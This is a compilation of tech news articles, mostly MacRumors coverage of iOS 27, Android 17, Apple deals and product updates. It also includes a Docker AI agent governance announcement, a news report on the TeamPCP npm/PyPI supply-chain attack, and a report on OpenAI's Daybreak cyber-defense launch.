On Android devices that are not compatible with AirDrop, Quick Share can be used to generate a QR code that can instantly share content with iOS devices via the cloud.

The QR code sharing feature is rolling out to all Android devices starting today, and will be fully available within the next month. Google says it also plans to make Quick Share available in apps like WhatsApp in the near future.

Google says that it also worked with Apple to make it easier to switch from an iPhone to an Android device, capabilities the two companies had to implement under Europe's Digital Markets Act. While Apple implemented the feature in iOS 26.3, Google says it will be coming to Samsung Galaxy and Google Pixel devices in 2026.

The transfer process will allow eSIM, passwords, photos, messages, apps, contacts, and Home Screen layout to migrate wirelessly from an iPhone to an Android device. Google has also implemented similar tools for simplifying switching between an Android device and an iPhone.Tags: Android, Google
This article, "Google Makes It Easier to Share Files Between Android and iPhone" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple is introducing an overhauled version of Siri in iOS 27, evolving the personal assistant into a more capable chatbot and AI agent able to compete with ChatGPT, Claude, and Gemini. With ‌Siri‌'s transition, Apple will be making multiple Siri-related design changes in ‌iOS 27‌, according to a new report from Bloomberg. ‌Siri‌ will largely live in the Dynamic Island in ‌iOS 27‌, but there will also be a dedicated ‌Siri‌ app for the first time.


When ‌Siri‌ is activated with the ‌Siri‌ wake word or through the iPhone's side button, a pill-shaped animation will be displayed in the ‌Dynamic Island‌. When ‌Siri‌ is asked a question or given a task, there will be a transparent results card. Swiping on it will bring up a conversation mode that looks similar to an iMessage chat, and it will incorporate small cards for the weather, notes, upcoming appointments, and other information that's relevant to queries.

Apple is also designing a full ‌Siri‌ app for ‌Siri‌ conversations. It will allow users to look back at prior chats, and begin new ‌Siri‌ chats. There is a grid of rectangles with summaries of past conversations that users can tap into, a search bar, and a "+" button for starting a new conversation. The app will support uploading images and documents, and users will be able to type to ‌Siri‌ or use voice input.

Swiping down from the top center of the display in any app will activate a system-wide search interface, with a "Search or Ask" bar in the ‌Dynamic Island‌ for typing or speaking questions. Search or Ask is similar to Spotlight Search, but Bloomberg suggests it will display "more advanced results and additional data from within apps."

‌Siri‌ will be able to draw information from the web to provide detailed answers to the typical questions users ask chatbots. ‌Siri‌'s responses will include bullet points with information and large images.

While ‌Siri‌ is the default for the search bar, pressing on it will let users select other chatbots to speak with, such as ChatGPT or Gemini. Apple plans to let users choose third-party AI services as the default for Apple Intelligence features like Writing Tools and Image Playground, expanding ‌Apple Intelligence‌ integration beyond ChatGPT.

Apple plans to overhaul the ‌Image Playground‌ app. The interface for generating a new image has fewer controls and a "describe a change" option for editing images that are created. Previously created images are displayed in a grid with more rounded edges, and instead of a New Image button, there's a "+" button. Apple has also been testing new models that produce more lifelike images, so we could see new image generation capabilities in ‌iOS 27‌.

Apple is also planning changes to the Camera app, Photos app, Wallet, and Shortcuts, plus there could be tweaks to Liquid Glass. More on what to expect from ‌iOS 27‌ can be found in our iOS 27 roundup.Related Roundup: iOS 27Tags: Bloomberg, Mark Gurman, Siri
This article, "iOS 27 Getting Major Siri Redesign With Chat Interface and Dedicated App" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple plans to make the Camera app more customizable in iOS 27, reports Bloomberg. Users will be able to select the features they want to see in the Camera app, like flash, exposure, timer, depth of field, photo styles, and resolution.


Camera controls, labeled as widgets, will be able to be placed at the top of the Camera interface in any order. Users will be able to select widgets from a transparent widget tray that comes up from the bottom of the app. Widgets will be organized into categories that include basic, manual, and settings.

Apple plans to use the same default layout that's available now with quick tap buttons for flash, Live Photos, and Night Mode, but the customizable interface will be added as a new advanced layout that will appeal to professional users.

Different modes like photo and video will have their own set of widgets, as will a new Siri camera mode that Apple plans to add to the app. ‌Siri‌ mode will incorporate the Visual Intelligence features that are currently accessible through the Camera Control or Action buttons.

Right now, users can tap into a view with all of the Camera controls from the top right of the app, but that view is moving to the right of the shutter button. Apple will also add new grid and level options.

In the Weather app, there will be a new Conditions panel for switching between temperature, rain, and wind. It will be the same as the interface that's available when tapping into one of the weather modules in the current version of the app.

Apple plans to add an updated start page to Safari, and it will have four tabs across the top for swapping between favorites, bookmarks, Reading List, and history.

There are system-wide design changes coming as well, according to Bloomberg. The tab bar in apps like Apple Music, Podcasts, News, and Apple TV will be adjusted to combine search with the other navigation options. Apple separated search in many apps when introducing Liquid Glass, but it sounds like the company is going to revert to the prior unified design.

When using the on-screen keyboard, there's a new animation that shows the keys sliding up from the bottom of the iPhone interface, plus Apple is adding redo and undo controls for fixing actions when customizing the Home Screen's icon and widget layouts.

Apple is planning to preview ‌iOS 27‌ at the Worldwide Developers Conference that begins on June 8.Related Roundup: iOS 27
This article, "iOS 27 to Bring Customizable Camera App, Tweaks to Weather, Safari and Liquid Glass" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Google today previewed Android 17, the next version of Android that it is bringing to smartphones and other devices. Android 17 includes multiple new AI features, and it comes about a month ahead of when Apple plans to unveil iOS 27 with new AI capabilities.


Google is now calling the AI features on Android "Gemini Intelligence," branding similar to Apple Intelligence. Google said it is transitioning Android from an operating system to an intelligence system, with proactive, on-device agentic AI.

Expanded Gemini integration - Gemini will be able to do more tasks autonomously, from booking classes to making purchases.
Visual context - Gemini will be able to draw context from what's on the screen, which is something that Apple is also bringing to iPhones soon. Google says Android users will be able to do things like bring up a long shopping list in the notes app, long press on the power button over the list, and have Gemini build a shopping cart with all of the items for delivery.
Smarter web browsing - Gemini in Chrome will let users research, summarize, and compare content on the web. Chrome auto browse will also be able to do more tasks like reserving a parking spot or booking an appointment.
Autofill - Android can fill more text fields in apps with Gemini's Personal Intelligence that draws information from apps like Gmail and Google Photos.
Rambler - Rambler is an AI voice dictation feature that cuts out filler words like um, ah, and like. Rambler will take the important parts from voice dictation, and create a concise message. It works with multiple languages at once.
Create My Widget - Create My Widget lets Android users build custom widgets by describing what they want in natural language. Widgets can do things like provide the weather, offer recipes, count down to events, provide the time, display stock info, and more.

There are other changes coming to Android 17 too.

3D Emoji - Google is adopting Noto 3D, a new 3D emoji collection.
Android Auto - Android Auto is getting expanded Gemini integration and a refreshed look with support for the Material 3 Expressive design. Google is adding customizable widgets, edge-to-edge Google Maps, and Immersive Navigation, which includes 3D views highlighting important navigation details. When parked, cars will support YouTube playback. Gemini Intelligence is coming to Android Auto cars, and it will be able to do things like respond to texts automatically or order food for pickup.
Google built-in - Cars with Google built-in are getting the same features, plus access to meeting apps like Zoom. Gemini is also rolling out to cars with Google built-in, and it can answer questions specific to each vehicle that it's installed in.
Screen Reactions - Screen Reactions lets users film with the front and back cameras at the same time for social media reaction videos.
Instagram integration - Google worked with Meta to improve the video and photo quality of content captured with Android devices and uploaded to Instagram. Google is also adding new tools to the Edits app, and improving Instagram on Android tablets.
Pause Point - Users can set an app as distracting, and Pause Point will give a 10-second breather before an app opens. Users can do a short breathing exercise or set a timer to limit time in the app. There are also options for looking at favorite photos, or moving to an alternative app like an audiobook app. Pause Point requires users to restart a phone to turn it off, which makes it more difficult to ignore.

Google says Gemini Intelligence features will roll out in waves beginning with the latest Samsung Galaxy and Google Pixel phones this summer, and expanding to Android watch, car, glasses, and laptops later in the year.

Gemini in Chrome features will be available in late June, with other Android 17 features expected to get to a stable release stage in June.Related Roundup: iOS 27Tags: Android, Google
This article, "Google Previews Android 17 With 'Gemini Intelligence' a Month Before Apple's iOS 27 Reveal" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Introducing Docker AI Governance: centralized control over how agents execute, what they can reach on the network, which credentials they can use, and which MCP tools they can call, so every developer in your company can run AI agents safely, wherever they work.
Your laptop is the new prod
Agents are the biggest productivity unlock the modern workplace has seen in a generation, and engineering is where the shift is most obvious. Developers aren’t using agents to autocomplete a function anymore. They’re using them to read whole codebases, refactor across services, and ship entire products, end to end. Vibe coding is real, it’s shipping to main, and it’s happening on laptops everywhere today.
The same shift is moving through every other function. A new class of agents called Claws is already in production, sending emails, managing calendars, booking travel, pulling CRM data, reconciling reports, and querying production systems. Marketing, finance, sales, and support are adopting them as fast as engineering is, because the productivity gains are too large to ignore and the companies that move first will out-execute the ones that don’t. Org-wide rollouts that used to take quarters are landing in weeks.
What’s more interesting than the speed of adoption is where all of this actually runs. Agents and Claws live outside the systems enterprises spent two decades hardening. They don’t sit behind your CI/CD pipeline, they don’t live inside your VPC, and they don’t follow your IAM model. They run on the developer’s machine, with the developer’s credentials, reaching into private repos, production APIs, customer records, and the open internet, often in the same session. The laptop just became the most powerful node in your enterprise, and it also became the most exposed. Laptop and agent environments are the new prod, and they need to be governed like prod.
What governance actually has to solve
The instinct in most enterprises is to reach for the tools that already exist, but none of them see what an agent is doing. CI/CD doesn’t see it because the agent isn’t a pipeline. The VPC doesn’t see it because the laptop is outside the perimeter. IAM doesn’t see it because the agent is acting as the developer. The result is that CISOs can’t tell what an agent touched, what it ran, or where the data went, and they also can’t tell the business to slow down. This is the bind every security leader is in right now.
Strip the problem to first principles and an agent has two paths to do significant harm. It either executes code itself, touching files and opening network connections, or it calls a tool through an MCP server to act on an external system. Govern both paths and you’ve governed the agent. Miss either one and you haven’t.
That’s the test for any AI governance solution worth taking seriously, and it has two parts. The controls have to live at the runtime layer where the agent actually executes, not as advisory rules layered on top that a clever prompt can route around. And they have to work consistently wherever the agent ends up running, because agents don’t stay on the laptop. They migrate to CI runners, to staging clusters, to production. A policy that only holds in one of those places is a gap waiting to be found.
Why Docker
Docker is the only company that meets both parts of that test, and the reason is structural.
Docker built the sandbox that contains the first path. Every agent session runs inside an microVM-based isolated environment where filesystem and network access are controlled by a hard boundary, which means enforcement happens at the level of the process, not as a suggestion the agent can ignore. Docker built the MCP Gateway that contains the second path. Every tool call routes through a single chokepoint where it can be authenticated, authorized, and logged before it reaches the external system. These controls at a primitive level, Docker Sandboxes and Docker MCP Gateway, make enforcement strict instead of advisory. We own the substrate the agent is running on, so the policy isn’t a wrapper around someone else’s runtime, it’s the runtime.
The second part is what makes this durable. The same sandbox primitive runs on the developer’s laptop, inside Kubernetes, and across cloud environments, with the same policy model and the same enforcement guarantees. When an agent moves from a developer’s machine to a CI runner to a production cluster, the policy moves with it, because the runtime underneath is the same in all three places. No other vendor can say that, because no other vendor is the runtime. Endpoint security tools don’t extend to clusters. Cluster security tools don’t reach the laptop. Cloud security tools don’t run on either. Docker covers all three because Docker is what’s actually executing the agent in all three.
Docker AI Governance is the control plane that sits on top of that runtime. It turns the sandbox and the MCP Gateway into centralized policy, defined once in the admin console, enforced at every node the agent touches, and auditable from end to end.
How Docker AI Governance works
From a single admin console, security teams define and enforce policy across four control surfaces: network, filesystem, credentials, and MCP tools. One policy layer that doesn’t need a per-machine setup and that consistently works across thousands of developers.
Sandbox policy for network and filesystem. Admins define allow and deny rules for domains, IPs, and CIDRs, alongside mount rules for filesystem paths with read-only or read-write scope. Every agent session runs inside an isolated sandbox where only approved endpoints are reachable and only approved directories are mountable, with enforcement happening at the proxy and mount level rather than as an advisory layer the agent can ignore.
Credential governance. Agents are dangerous in proportion to what they can authenticate as, so Docker AI Governance controls which credentials, tokens, and secrets an agent session can see, scopes them to the duration of that session, and blocks exfiltration to unapproved destinations. Developers stop pasting tokens into prompts, and security stops wondering where those tokens ended up.
MCP tool governance. Admins control which MCP servers and tools are available through organization-wide managed policies, with unapproved servers blocked by default. Every MCP call flows through the same policy engine as network, filesystem, and credential requests, so there’s no separate surface to configure and no bypass path.
Role-based policy assignment. Different teams need different levels of access, and security research will reasonably require broader MCP usage than finance. Create policy groups, assign users through your IdP, and layer team-specific rules on top of organization-wide guardrails that can’t be overridden. It scales to thousands of developers through existing SAML and SCIM integrations with no per-user setup.
Audit and visibility. Every policy evaluation generates a structured event with user identity, timestamp, session context, and the rule that triggered the decision, and logs export cleanly to your existing SIEM and compliance systems. This is the evidence CISOs need to approve AI usage at scale rather than tolerate it under the table.
Automatic policy propagation. When a developer authenticates, their machine pulls the latest policy, and updates reach every device automatically. Admins define policy once and Docker enforces it everywhere.
What this unlocks
CISOs get the governance layer they’ve been missing and the confidence to approve agent usage at scale rather than block it. Platform teams get an easy way to set up governance: by defining a policy once and having it enforced everywhere with full audibility. This removes the operational burden of scaling AI adoption across the company. Developers get what agents promised in the first place: real speed and autonomy, with governance that stays out of the way. We built Docker AI Governance with these principles in mind: agents should be autonomous and governance should be invisible.
Available today
Docker AI Governance is available now. If you’re a security leader trying to close the AI governance gap, or a platform team ready to roll out agents without compromising control, it was built for you.
Contact sales to learn more.

View the full article
Apple today said Hearing Aid features are now available for the AirPods Pro 2 and AirPods Pro 3 in Italy, Romania, and Czechia, while Hypertension alerts have expanded to Israel.


The Hearing Aid option allows the AirPods Pro to be used as an over-the-counter alternative to a traditional set of hearing aids. The AirPods Pro can improve sound to mitigate mild to moderate hearing loss, adjusting voices and sounds around the user to improve hearing. It can also set music, videos, and phone calls to optimal sound levels using a personalized hearing profile created after taking a Hearing Test.

Loud Sound Reduction also prevents hearing damage from loud ambient noise by cutting down on high-decibel sound when using Transparency and Adaptive modes.

Hearing Aid capabilities are available with the AirPods Pro 2 and ‌AirPods Pro 3‌ when paired with a device running iOS 26/iPadOS 26 or later.

In Israel, users will be able to get an alert if the Apple Watch detects signs of chronic high blood pressure. Alerts use data collected from the heart rate sensor over a 30-day period.
Hypertension alerts are available on the Apple Watch Series 9 and later and the Apple Watch Ultra 2 and later.Related Roundups: AirPods 4, Apple Watch 11Buyer's Guide: AirPods (Neutral), Apple Watch (Caution)Related Forum: AirPods
This article, "Apple Watch Hypertension Alerts and AirPods Hearing Aid Feature Expand to More Countries" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple's newest M5 Pro and M5 Max MacBook Pro models have been hitting new low prices on Amazon recently, and now the M5 model from 2025 has a new record low price. You can get the 32GB/1TB 14-inch M5 MacBook Pro for $1,799.00, down from $2,099.00.

Note: MacRumors is an affiliate partner with Amazon. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.

At $300 off, this is now the lowest price we've ever tracked on this model, and it's only available in Silver. This is the model that launched in the fall of 2025 as part of a refresh of the MacBook Pro lineup, featuring a 14.2-inch Liquid Retina XDR display and 10-core CPU and 10-core GPU.

$300 OFFM5 MacBook Pro (32GB/1TB) for $1,799.00

Amazon provides an estimated delivery date of May 13-14 for free delivery options, depending on your location. If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "M5 MacBook Pro Hits Record Low Price With Major $300 Discount at Amazon" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The TeamPCP threat group has pulled off another big supply chain attack which within a few hours this week was able to successfully compromise 170 Node Package Manager (npm) and PyPI packages.
The attack affected the entire TanStack Router ecosystem (@tanstack) of 42 packages, a routing library hugely popular among React web application developers. Multiple other packages were also affected, including @squawk (87 packages), @uipath (66 packages), @tallyui (30 packages), @beproduct (18 packages), as well as Mistral AI’s SDK suite on both npm and PyPI, and the Guardrails AI PyPI package.
The attacks, noticed by several vendors using automated security tools, happened on May 11, spreading rapidly through package ecosystems thanks to the worm capabilities of the automated Mini Shai-Hulud malware platform, analysis found.
The exact number of package versions caught up in the attack varies depending on the source; according to Aikido Security it was 373 across 169 package namespaces, while SafeDep said the number was 404 package versions across 170 npm packages, with two affecting PyPI.
Dead man’s switch
A striking feature of the attacks is the ease with which the threat group blamed for the attack, TeamPCP, was able to hijack the project’s legitimate release pipelines by exploiting a mixture of maintainer misconfigurations and GitHub Actions weaknesses.
Instead of stealing maintainer credentials directly, the attackers exploited a risky trigger, pull_request_target. This allows third-party workflows to run automatically — a way of avoiding maintainer approval fatigue — but means that the maintainer’s short-lived OIDC tokens become vulnerable to scraping.
Armed with these tokens, the attacker were able to compromise the packages by injecting the malicious Mini Shai-Hulud malware, which propagated to other projects.
The purpose is to steal developer credentials such as GitHub and npm tokens, cloud credentials, API keys, Kubernetes service accounts, and SSH keys. Less pleasantly, the malware also installs a destructive ‘dead man’s switch’ monitor which attempts to delete the user’s entire home directory if a developer revokes a stolen GitHub token.
Attacks by TeamPCP targeting software supply chains have become a recurring theme in recent months. This includes a similar compromise in April of the command line version of the Bitwarden password manager. A month earlier it was Aqua Security’s Trivy open-source vulnerability scanner, later revealed to have caused a data breach at the EU’s Europa.eu web hub. 
Enterprise prize
According to Abhisek Datta, founder of SafeDep, one of the first vendors to detect the compromise, TeamPCP  appeared to have designed the campaign to target US developers.
“They know that high-profile attacks will be detected quickly by the industry. By targeting specific US working hours, they likely want to maximize their return during a short window of opportunity,” he said via email.
“The way the software usage and trust network has evolved, primarily leaning towards implicit trust, is probably the root cause that is being exploited in these attacks. Unfortunately, it’s hard to fix, especially today where developers and software companies expect velocity over everything else.”
Developers could put more security around packages, but this would create added friction, Datta said. “Honestly, I would say this is something the world is still trying to figure out.”
SafeDep has published a full list of affected packages, with indicators of compromise. If any of the compromised packages are in use, recommended actions are to check the lockfile for known compromised versions, pin dependencies to knows good versions, and to check for evidence of malware files. If an infected version is suspected, credentials in use at the time of import should be rotated.

View the full article
If your Mac's storage has been mysteriously shrinking recently and you use Google Chrome, you may have already identified the culprit. The browser has been downloading a 4GB AI model file onto computers without explicit user consent. Here's how to reclaim the space.


The file in question is called "weights.bin," which powers Google's on-device Gemini Nano AI model – the engine behind Chrome features like scam detection, autofill suggestions, and the "Help Me Write" tool. Local models tend to be pretty big storage-wise, and this one is no different. The problem is that Google hasn't clearly signposted the fact that it's eating 4GB of your drive with training data.

The issue only recently came to light thanks to security researcher Alexander Hanff, who noticed that Chrome installs the model on any device meeting the minimum hardware requirements, only without prompting you whether you'd like it there in the first place.

How to Check if the File Is on Your Mac

The first thing to do is confirm that the model is actually taking up space on your machine. While there's no clear answer in Google's release notes, recent reports suggest that the file started appearing after updating to Chrome version 148.0.7778.97. Here's how you can find out if your computer was affected:

Open Finder, then click Go in the menu bar.
Hold the Option key and click Library in the dropdown menu.
Open Application Support ➝ Google ➝ Chrome ➝ Default.
Look for a folder named "OptGuideOnDeviceModel."
If the folder exists and contains a file called weights.bin, the model is installed. You can right-click the file and choose Get Info to confirm its size. If the folder isn't there, you can relax – Chrome hasn't downloaded the model to your Mac.

How to Remove the 4GB File for Good

Simply deleting weights.bin from Chrome's library folder isn't a long-term solution because Chrome will likely quietly re-download it the next time you launch the browser. To make the removal permanent, you need to disable Chrome's on-device AI features.

Open Chrome.
Click the three-dot menu in the top-right corner, then choose Settings.
In the left sidebar, click System.
Toggle off On-device AI.


Once this setting is switched off, Chrome will remove the model and should stop downloading it in future updates. Remember that deleting the model will also disable any Chrome features that rely on it.

If you don't see the toggle in Chrome's Settings, it likely hasn't propagated to your computer yet. In that case, type chrome://flags into Chrome's address bar and disable any AI-related flags you see, then delete the weights.bin file manually in Finder. If after that you're still concerned about the lack of consent, it might be worth switching to a different browser.Tag: Chrome
This article, "Stop Chrome Browser From Downloading a Hidden 4GB AI File" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Apple today announced that characters from the hit animated kids show Bluey are coming to five Apple Arcade games starting Thursday, May 21, as part of a limited-time crossover event. The games that will be receiving Bluey updates include Crossy Road Castle, stitch., puffies., Suika Game+, and Disney Coloring World+.

Bluey is coming to Crossy Road Castle
Apple Arcade will also be adding another four games on Thursday, June 4: Mini Football Legends, My Talking Tom 2+, Coffee Inc 2+, and FreeCell Solitaire: Card Game+. More details about each game are outlined in Apple's announcement.

Apple Arcade is a subscription service that provides access to hundreds of games across the iPhone, iPad, Mac, Apple TV, and Apple Vision Pro. All of the games are free of ads and in-app purchases. In the U.S., Apple Arcade costs $6.99 per month, and it is also bundled with other Apple services in all Apple One plans.

Apple Arcade can be accessed through the App Store and the Apple Games app.Tags: Apple Arcade, Bluey
This article, "Bluey is Taking Over Apple Arcade Next Week" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
The Apple Sales Coach app will begin using AI-generated video presenters to deliver personalized training content to retail salespeople around the world.


In a new video message, an Apple trainer said that the update addresses a limitation of traditional training programs: the impossibility of creating truly individualized content for hundreds of thousands of salespeople across different markets, languages, and product focuses. Apple said it will now use AI to generate short, focused videos tailored to the products a seller works with, the skills they are developing, and the language they speak.



AI-generated presenters will be identifiable by an on-screen icon, and Apple emphasized that the underlying content remains entirely human-driven. The company's training team apparently writes every script and verifies every detail, with AI serving as the delivery mechanism rather than the author.

Apple said the shift will allow it to produce more videos on more topics, faster, and update them more frequently than was previously possible. The company described the move as "just the beginning," noting that Apple Sales Coach improves the more it is used.Tag: Artificial Intelligence
This article, "Apple Sales Coach Will Use AI-Generated Video Presenters" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Chinese leaker "Instant Digital" today said the iPhone 18 Pro will not feature dual-layer OLED technology, adding that Apple's current thermal management approach remains a limiting factor for sustained outdoor brightness on Pro iPhones.


In a new post on Weibo, Instant Digital commented on a question about when dual-layer OLED would arrive on iPhone, saying simply: "In any case, the 18 Pro definitely won't have it." The leaker had earlier this week reflected on last year's predictions, noting that the iPhone 17 Pro made little meaningful progress in maintaining peak brightness levels outdoors. Instant Digital suggested that without a change to Apple's thermal throttling strategy, dual-layer OLED is the only path to a significant real-world brightness improvement.

The assessment aligns with what has been rumored elsewhere. A report from last August indicated that Apple has set a two-year production plan for tandem OLED to be adapted for the iPhone, but that Apple had yet to decide whether to develop the panels with Samsung Display or LG Display, pointing to an arrival no earlier than sometime after 2028.

The report also noted that the variant Apple is reviewing differs from the full tandem OLED used in the iPad Pro. Rather than stacking two complete RGB layers, Apple is said to be evaluating a "simplified tandem" design that doubles only the blue sub-pixel layer while keeping red and green on a single layer.

For the ‌iPhone 18 Pro‌, the display upgrade on the table is said to be a move to LTPO+ technology. As reported earlier this month, Apple is expected to finalize panel approvals for the ‌iPhone 18 Pro‌ and Pro Max with Samsung Display and LG Display, with China's BOE reportedly closed out of the premium tier due to quality and yield issues with its own LTPO+ technology. The upgrade from the standard LTPO used in the ‌iPhone 17 Pro‌ should improve battery efficiency by enabling finer control of OLED light emission, but it does not address peak brightness or the thermal throttling that limits sustained outdoor luminance.

Dual-layer OLED would address both matters. Since each emissive layer operates at lower intensity to achieve a given brightness target, the display generates less heat, reducing the thermal pressure that causes Apple's current panels to throttle under sustained use. The M4 ‌iPad Pro‌ was the first Apple product to adopt the technology. Instant Digital's comments suggest iPhone customers will have to wait considerably longer.Tag: Instant Digital
This article, "Much Brighter iPhone Display Still Years Away, Leaker Suggests" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
While the ongoing RAM chip shortage is leading some Android smartphone makers to increase prices, one analyst believes that Apple will take advantage of the situation with the upcoming iPhone 18 Pro and iPhone 18 Pro Max.


In a research note with GF Securities today, analyst Jeff Pu said he expects Apple to outperform in the smartphone market by having an "aggressive pricing strategy" for the iPhone 18 Pro models. He previously predicted that the starting prices of the iPhone 18 Pro models will be unchanged or only slightly higher compared to the iPhone 17 Pro models.

In the U.S., the iPhone 17 Pro starts at $1,099 and the iPhone 17 Pro Max starts at $1,199, with 256GB of storage. Both devices are equipped with 12GB of RAM, and the iPhone 18 Pro models are expected to have an equal amount of RAM.

Apple said that it expects "significantly higher memory costs" in the current March-June quarter, so it is not entirely immune to the problem. However, Apple's scale likely gives it more leverage over RAM suppliers compared to most if not all Android smartphone makers. In addition, Pu previously said that he expected Apple to find ways to lower the costs of some other iPhone components, including the display and cameras.

iPhone 18 Pro models are rumored to feature a smaller Dynamic Island, a faster A20 Pro chip, variable aperture for at least one rear camera, a simplified Camera Control button, 5G via satellite, a special "Dark Cherry" color, and more.

Apple is expected to unveil the iPhone 18 Pro models in September, while the iPhone 18 and iPhone 18e are expected to debut around March 2027.Related Roundup: iPhone 18 ProTag: Jeff Pu
This article, "iPhone 18 Pro May Have 'Aggressive' Starting Price Despite RAM Crisis" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
Woot this week is back with a massive sale on Solo Loop and Braided Solo Loop bands for Apple Watch. In addition to these popular discounts, Woot also has all-time low prices on Sport Loops, Apple Watch Ultra bands, the first generation AirTag, Beats Fit Pro, and more.

Note: MacRumors is an affiliate partner with Woot. When you click a link and make a purchase, we may receive a small payment, which helps us keep the site running.
Apple Watch Bands

You can get the Solo Loop for just $14.99 ($34 off) and the Braided Solo Loop for $29.99 ($69 off). All bands in this sale are in brand new condition and come with a one-year Apple limited warranty.

UP TO 70% OFFApple Watch Bands at Woot

Woot has reorganized the sale for 2026, with shoppers choosing their size before color this time around. Woot has size 1-12 of the Solo Loop and Braided Solo Loop available, but color and style availability varies within each size category.

Shoppers should note that this sale is focused on colors of the Braided Solo Loop and Solo Loop that Apple has stopped selling, and it doesn't include any of the new band colors. That being said, all of the bands in this sale are in new condition.

This sale has also expanded to include a few models of the Sport Band, Sport Loop, Nike Sport Band, and some Apple Watch Ultra bands. You can get up to 69 percent off these bands through the end of the month.

AirTag

Additionally, Woot today has Apple's first generation AirTag 4-Pack for $56.99, down from $99.00, which is a match of the all-time low price on this model. The AirTag 4-Pack is in new condition and comes with a 90-day Woot limited warranty.

$42 OFFAirTag 4-Pack (1st Gen) for $56.99

Woot provides an estimated delivery date between May 21-26 for the AirTag 4-Pack, and the sale is set to last for four more days. Deals on the first generation AirTag models have been rare since the launch of the AirTag 2, so this is a great time to snag an older model if you've been waiting for a sale.

More Deals

OtterBox - Save up to 92% on iPhone cases and more
Beats Fit Pro - $143.23, down from $199.95
Charging accessories - Save up to 71%
Samsung TVs - Save on The Frame and more

If you're on the hunt for more discounts, be sure to visit our Apple Deals roundup where we recap the best Apple-related bargains of the past week.



Deals Newsletter

Interested in hearing more about the best deals you can find in 2026? Sign up for our Deals Newsletter and we'll keep you updated so you don't miss the biggest deals of the season!




Related Roundup: Apple Deals
This article, "Missed Out on Classic Apple Watch Bands? Woot's Latest Sale Revives Discontinued Colors at Steep Discounts" first appeared on MacRumors.com

Discuss this article in our forums

View the full article
OpenAI has unveiled Daybreak, its answer to Anthropic’s Claude Mythos, amid a growing market for frontier AI-powered cyber defense platforms. The initiative combines OpenAI’s large language models, Codex’s agentic capabilities, and integrations with the broader enterprise security ecosystem.
The company said Daybreak is focused on accelerating cyber defense operations and enabling organizations to secure software across the development lifecycle continuously.
Announcing the initiative on X, Sam Altman, CEO at OpenAI, said, “OpenAI is launching Daybreak, our effort to accelerate cyber defense and continuously secure software. AI is already good and about to get super good at cybersecurity; we’d like to start working with as many companies as possible now to help them continuously secure themselves.”
Daybreak takes on Mythos
The surge in AI-driven cyber threats has recently shifted the AI race toward AI cybersecurity models. In April this year, Anthropic unveiled Project Glasswing, built around Claude Mythos Preview. Anthropic described it as a cybersecurity-focused AI system capable of autonomously identifying software vulnerabilities at scale.
While introducing Daybreak, OpenAI explained that deploying AI in modern cyber defense involves three core stages. The first is prioritizing high-impact threats and reducing hours of security analysis to minutes through more efficient AI reasoning and token usage. The second involves generating and testing patches directly within enterprise repositories using scoped access, monitoring, and review. The final stage focuses on sending results and audit-ready evidence back into enterprise systems to track, validate, and verify remediation efforts.
In Daybreak, Codex security is designed to identify and fix vulnerabilities by building an editable threat model from the enterprise’s repository and focusing analysis on realistic attack paths and high-impact code. The system would then validate likely vulnerabilities in an isolated environment. This would help teams to prioritise real, reproducible issues over noisy alerts. This will be followed by automated detection and response, where AI will be able to spot higher-risk vulnerabilities and enable end-to-end automated monitoring.
“The divergence reflects fundamentally different approaches to security and commercialization. OpenAI is positioning Daybreak and GPT-5.5-Cyber as a controlled cyber-defense platform for vetted defenders, focused on operational workflows such as vulnerability detection, patch validation, malware analysis, and secure software development,” said Pareekh Jain, CEO at EIIRTrend & Pareekh Consulting. “Strategically, Daybreak helps OpenAI counter the perception that Anthropic leads in frontier cyber AI. Instead of relying on a single secretive model, OpenAI is building a scalable cyber-defense ecosystem integrated into enterprise workflows and developer environments.”
Jain said Anthropic, by contrast, treats Mythos as a far more sensitive dual-use cyber-intelligence system with stronger offensive reasoning capabilities and higher misuse risks. As a result, access remains tightly restricted to a small set of organizations, influenced both by safety concerns and broader US national-security considerations.
OpenAI’s cybersecurity model stack
OpenAI is pursuing a scalable cyber defense platform strategy with Daybreak and is rolling out the initiative through three different model tiers: GPT-5.5 (default), GPT-5.5 with Trusted Access for Cyber, and GPT-5.5-Cyber.
The standard GPT-5.5 model is positioned for general-purpose enterprise use cases, including developer assistance and knowledge work. GPT-5.5 with Trusted Access for Cyber is designed for defensive security workflows such as secure code review, vulnerability triage, malware analysis, detection engineering, and patch validation.
At the highest tier, GPT-5.5-Cyber will provide preview access for specialized cybersecurity workflows, including authorized red teaming, penetration testing, and controlled validation.
Governments and industry join in
OpenAI said it plans to build Daybreak alongside both industry and government partners as it expands the platform’s cybersecurity capabilities and enterprise reach.
To begin with, Daybreak is being developed alongside partners including Cisco, Oracle, CrowdStrike, Palo Alto Networks, Cloudflare, Fortinet, Akamai, and Zscaler.
At the government level, the European Commission is currently in discussions with OpenAI regarding access to its advanced AI models for identifying cybersecurity vulnerabilities. According to Commission spokesperson Thomas Regnier, OpenAI proactively approached the EU, and discussions are underway around potential next steps, including possible access to the company’s new model. Discussions with Anthropic are also continuing. However, they have not yet reached the same stage as those with OpenAI.
While answering questions during the Commission’s daily press briefing, spokesperson Regnier said the European Commission welcomes OpenAI’s transparency and their intent to give the Commission access to its new model. This will allow the Commission to follow the deployment of this model very closely and also to potentially address certain security concerns in a closer way.
Amit Jaju, senior managing director at Ankura Consulting, said, “OpenAI is actively leveraging its trusted access framework to rapidly build goodwill with European regulators and demonstrate transparency. By offering early access, OpenAI aligns itself closely with upcoming regulatory demands and secures a strategic market position.”  Jaju noted that Anthropic is taking a highly restricted approach, initially sharing its Mythos model only with select US technology partners to patch vulnerabilities first. “Anthropic recognizes the severe risks associated with autonomous AI agents and the potential for the model to be misused to target critical software, choosing to prioritize closed testing over rapid geopolitical expansion.”
View the full article
